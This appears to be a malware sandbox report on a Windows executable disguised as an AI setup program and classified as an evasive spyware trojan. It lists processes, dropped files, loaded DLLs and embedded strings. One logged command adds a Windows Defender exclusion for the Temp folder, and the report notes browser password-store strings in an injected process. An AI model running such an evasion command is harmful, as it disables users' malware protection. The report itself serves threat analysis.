Source: mDHwap5GlV.exe, 00000000.00000002.2596096978.000000000D060000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2611810679.000000000E300000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenamemscordaccore.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenamePro_AI_setup_v_1.03.dllH vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameMicrosoft.CSharp.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.Core.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameSystem.AppContext.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameSystem.Buffers.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameSystem.Collections.Immutable.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: powershell.exe, 00000004.00000002.1923580588.00000000072C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .sLn[
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/4@3/4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2932:120:WilError_03
Source: C:\Users\user\Desktop\mDHwap5GlV.exe File created: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe
Source: mDHwap5GlV.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: pipanel.exe, 00000008.00000003.3151850567.0000000005374000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3177263165.0000000005341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: mDHwap5GlV.exe String found in binary or memory: requests-started-rate
Source: mDHwap5GlV.exe String found in binary or memory: requests-started
Source: mDHwap5GlV.exe String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: mDHwap5GlV.exe String found in binary or memory: Morph - Structs/AddrExp
Source: mDHwap5GlV.exe String found in binary or memory: prejitNYI: patchpoint info generationlooptail.call and not BBINSTRImportationPre-importExpand patchpointsIndirect call transformProfile instrumentation prepPost-importProfile incorporationProfile instrumentationMorph - InliningMorph - InitAllocate ObjectsMorph - Add internal blocksRemove empty finallyRemove empty tryClone finallyMerge callfinally chainsCompute predsUpdate finally target flagsMorph - Structs/AddrExpUpdate flow graph early passMorph - ByRefsForward SubstitutionMorph - GlobalMorph - Promote StructsGS CookieMorph - FinishMerge throw blocksCompute edge weights (1, false)Optimize control flowInvert loopsCompute blocks reachabilityOptimize layoutRedundant zero InitsSet block weightsClone loopsFind loopsClear loop infoUnroll loopsHoist loop codeMorph array opsOpt add copiesMark local varsFind oper orderOptimize boolsBuild SSA representationSet block orderSSA: Doms1SSA: topological sortSSA: DFSSA: livenessSSA: renameSSA: insert phisDo value numberingEarly Value PropagationOptimize Valnum CSEsOptimize index checksRedundant branch optsVN based copy propUpdate flow graph opt passAssertion propInsert GC PollsCompute edge weights (2, false)Rationalize IRDetermine first cold blockLocal var livenessDo 'simple' loweringPer block local var livenessLocal var liveness initLowering decompositionGlobal local var livenessCalculate stack level slotsLowering nodeinfoLSRA build intervalsLinear scan register allocLSRA resolveLSRA allocateGenerate codePlace 'align' instructionsEmit GC+EH tablesEmit codePost-EmitProcessor does not have a high-frequency timer.
Source: mDHwap5GlV.exe String found in binary or memory: kernelbase.dllVirtualAlloc2MapViewOfFile3bad array new lengthstring too longApplication root path is empty. This shouldn't happenUsing internal fxrUsing internal hostpolicyPath containing probing policy and assemblies to probe for.--depsfile--additionalprobingpath<path>Path to <application>.runtimeconfig.json file.--fx-versionPath to <application>.deps.json file.--runtimeconfig--roll-forward<value><version>Version of the installed Shared Framework to use to run the application.Path to additional deps.json file.--roll-forward-on-no-candidate-fxRoll forward to framework version (LatestPatch, Minor, LatestMinor, Major, LatestMajor, Disable)--additional-depssdkParsed known arg %s = %s<n><obsolete>Using the provided arguments to determine the application to execute.Application '%s' is not a managed executable.Failed to parse supported options or their values: %s %-*s %sThe application to execute does not exist: '%s'--- Executing in split/FX mode...Application '%s' does not exist.dotnet exec needs a managed .dll or .exe extension. The application specified was '%s'execstatic--- Executing in a native executable mode...--- Executing in muxer mode... No SDKs were found.
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/download --list-runtimes Display the installed runtimes --list-sdks Display the installed SDKs The path to an application .dll file to execute.host-options: --info Display .NET information.vector too longCommon Options: -h|--help Displays this help.invalid hash bucket countinvalid string positionunordered_map/set too long--- Invoked %s [commit hash: %s]hostfxr_main_bundle_startupinfohostfxr_main_startupinfoA fatal error occurred while processing application bundleInvalid startup info: host_path, dotnet_root, and app_path should not be null.get-native-search-directories.json.dev.jsonHosting components are already initialized. Re-initialization to execute an app is not allowed.|arch|/|tfm|Ignoring host interpreted additional probing path %s as it does not exist.Runtime config is cfg=%s dev=%s|arch|\|tfm|App runtimeconfig.json from [%s]Specified runtimeconfig.json from [%s]Ignoring additional probing path %s as it does not exist.The specified runtimeconfig.json [%s] does not existDetecting mode... CoreCLR present in dotnet root [%s] and checking if [%s] file present=[%d].runtimeconfig.jsonInvalid runtimeconfig.json [%s] [%s].deps.jsonIt's invalid to use both '%s' and '%s' command line options.DOTNET_ADDITIONAL_DEPSThe specified deps.json [%s] does not existInvalid value for command line argument '%s'self-containedExecuting as a %s app as per config file [%s]HOSTFXR_PATHframework-dependent--list-sdks--list-runtimesUsing dotnet root path [%s]-?/?-h--help dotnet.dll--infoThe command could not be loaded, possibly because:
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: mDHwap5GlV.exe String found in binary or memory: /notify-launch
Source: unknown Process created: C:\Users\user\Desktop\mDHwap5GlV.exe "C:\Users\user\Desktop\mDHwap5GlV.exe"
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe "C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe"
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe "C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe"
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\"
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe "C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe"
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe "C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe"
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: icu.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: msquic.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: wshunix.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: devobj.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: webio.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: schannel.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: amsi.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: mDHwap5GlV.exe Static PE information: certificate valid
Source: mDHwap5GlV.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: mDHwap5GlV.exe Static file information: File size 62920824 > 1048576
Source: mDHwap5GlV.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x520400
Source: mDHwap5GlV.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x138a00
Source: mDHwap5GlV.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x14f600
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: mDHwap5GlV.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: mDHwap5GlV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net7.0\System.Linq.Expressions.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2610536524.000000000E271000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net7.0\System.Linq.pdbSHA256#0$B source: mDHwap5GlV.exe, 00000000.00000002.2587665887.000000000A930000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2587777590.000000000A9B1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net7.0\System.Net.ServicePoint.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net7.0-windows\System.Net.NameResolution.pdbSHA256A source: mDHwap5GlV.exe, 00000000.00000002.2612038536.000000000E351000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: wntdll.pdb source: decrypted_app_1.exe, 00000007.00000002.3101125278.00000000030E0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net7.0-windows/Microsoft.VisualBasic.pdbSHA2565 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net7.0-windows\System.Net.Quic.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net7.0\System.Collections.Concurrent.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: System.Net.Security.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593612711.000000000C991000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net7.0-windows/System.Management.pdb source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net7.0-windows/Microsoft.VisualBasic.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net7.0\System.Diagnostics.DiagnosticSource.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdba source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.CodeDom/Release/net7.0/System.CodeDom.pdb source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Buffers\Release\net7.0\System.Buffers.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x86\Release\System.Private.CoreLib.pdb source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\DayDerry\Pro_AI_setup_v_1.03\obj\Release\net7.0\win-x86\Pro_AI_setup_v_1.03.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\dlls\mscordac\mscordaccore.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Linq.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2587665887.000000000A930000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2587777590.000000000A9B1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices.RuntimeInformation\Release\net7.0\System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net7.0\System.Memory.pdbSHA256oY source: mDHwap5GlV.exe, 00000000.00000002.2604929693.000000000D481000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604788493.000000000D440000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Immutable\Release\net7.0\System.Collections.Immutable.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Collections.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2605844050.000000000D521000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2605777963.000000000D4D0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net7.0\System.Threading.Thread.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2609058208.000000000DEE0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb>i source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net7.0-windows\System.Diagnostics.Process.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607643100.000000000DDB0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2620268309.000000000E7F0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2620375104.000000000E811000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Data/Release/net7.0-windows/System.Data.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
